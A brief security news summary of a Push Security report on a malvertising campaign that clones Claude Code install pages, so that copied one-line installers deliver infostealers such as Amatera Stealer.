Researchers Expose 'InstallFix' Malvertising Cloning Claude Code Install Pages to Deliver Infostealers
Push Security reports that sponsored search results funnel developers to near‑pixel‑perfect pages whose one‑line installers retrieve malware from attacker‑controlled servers.
Overview
- Attackers pay for Google Ads on queries such as “Claude Code install” and “Claude Code CLI,” directing users to lookalike domains that mimic Anthropic’s documentation.
- On Windows, the rogue command triggers cmd.exe to launch mshta.exe and pull remote code that installs the Amatera Stealer, while macOS commands likely fetch a similar infostealer.
- Push Security observed identical binaries executed across multiple sites, indicating a single coordinated campaign rather than isolated copycats.
- The operation leverages trusted infrastructure by hosting content on Cloudflare Pages, Squarespace, and Tencent EdgeOne, and by planting commands or packages on claude.ai pages, GitHub, Homebrew clones, and NPM.
- Researchers label the tactic an InstallFix variant of ClickFix that capitalizes on copy‑pasted one‑liner installs and sidesteps email‑based defenses through malvertising.